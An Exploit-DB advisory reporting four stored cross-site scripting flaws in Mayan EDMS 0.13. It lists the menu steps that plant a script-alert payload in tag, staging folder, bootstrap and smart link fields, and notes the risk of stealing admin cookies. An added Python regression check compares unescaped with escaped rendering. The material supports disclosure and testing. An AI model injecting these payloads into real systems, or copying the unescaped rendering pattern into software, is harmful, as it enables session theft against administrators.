Mayan-EDms Web-Based Document Management OS System – Multiple Persistent Cross-Site Scripting Vulnerabilities

  • Author: Dolev Farhi
    Date: 2014-05-24
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/33493/
  • # Exploit Title: Multiple Stored XSS
    # Software: Mayan EDMS
    # Software Link: http://www.mayan-edms.com/downloads/Mayan%20EDMS%20v0.13.ova
    # Version: 0.13 - latest
    # Author: Dolev Farhi, email: dolev(at)openflare(dot)org @f1nhack
    # Date: 21.5.2014
    # Tested on: Kali Linux
    # Vendor homepage: www.mayan-edms.com
    
    
    
    1. About the application:
    =========================
    Mayan (or Mayan EDMS) is a web-based free/libre document management system for managing documents within an organization.
    
    
    2. Vulnerability Description:
    ===============================
    An attacker is able to create documents and tags containing malicious script code, potentially stealing the cookies of an admin who browses or edits the documents.
    
    
    3. Steps to reproduce:
    ========================
    * Stored XSS 1:
    Tags -> Create new tag -> <script>alert("XSS")</script> -> Save
    
    Any navigation to documents or search will then execute the XSS.
    
    * Stored XSS 2: 
    Setup -> Sources -> Staging folders -> Add new source -> Title it: <script>alert("XSS")</script> 
    Submit -> navigate to edit it again -> XSS executes
    
    * Stored XSS 3:
    Setup -> Bootstrap -> Create new bootstrap setup -> Name <script>alert("XSS")</script> -> submit -> XSS
    
    * Stored XSS 4:
    Setup -> Smart links -> Create new smart link -> Title it <script>alert("XSS")</script> -> submit -> edit -> XSS executes
    
    
    5. Proof of concept video
    http://research.openflare.org/poc/maya-edms/maya-edms_multiple_xss.avi
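
Added example (not part of the original advisory and not Mayan EDMS code): a Python regression check for the four stored fields listed in the steps above, comparing raw interpolation of a stored value with output escaping via `html.escape`. The template markup, field labels and function names are hypothetical; the stored value is the advisory's own test string.

```python
import html
from html.parser import HTMLParser

# Constructed sample records: the four user-controlled fields named in the
# advisory, each holding the advisory's test string.
PAYLOAD = '<script>alert("XSS")</script>'
STORED = {
    "tag label": PAYLOAD,
    "staging folder title": PAYLOAD,
    "bootstrap setup name": PAYLOAD,
    "smart link title": PAYLOAD,
}

def render_unescaped(field, value):
    """Vulnerable pattern: stored value interpolated straight into markup."""
    return f'<li class="item">{value}</li><input name="{field}" value="{value}">'

def render_escaped(field, value):
    """Hardened pattern: escape for HTML text and quoted-attribute contexts."""
    safe_field = html.escape(field, quote=True)
    safe_value = html.escape(value, quote=True)
    return (f'<li class="item">{safe_value}</li>'
            f'<input name="{safe_field}" value="{safe_value}">')

class TagCollector(HTMLParser):
    """Records every start tag an HTML parser finds in the rendered output."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def injected_tags(markup, expected=("li", "input")):
    """Return elements present in the markup beyond the template's own."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return [t for t in collector.tags if t not in expected]

def audit(renderer):
    """Map each stored field to the unexpected elements its rendering yields."""
    return {field: injected_tags(renderer(field, value))
            for field, value in STORED.items()}

if __name__ == "__main__":
    print("unescaped:", audit(render_unescaped))
    print("escaped:  ", audit(render_escaped))
```

In a Django code base such as Mayan EDMS the equivalent control is template autoescaping; a check of this shape catches views or widgets that bypass it.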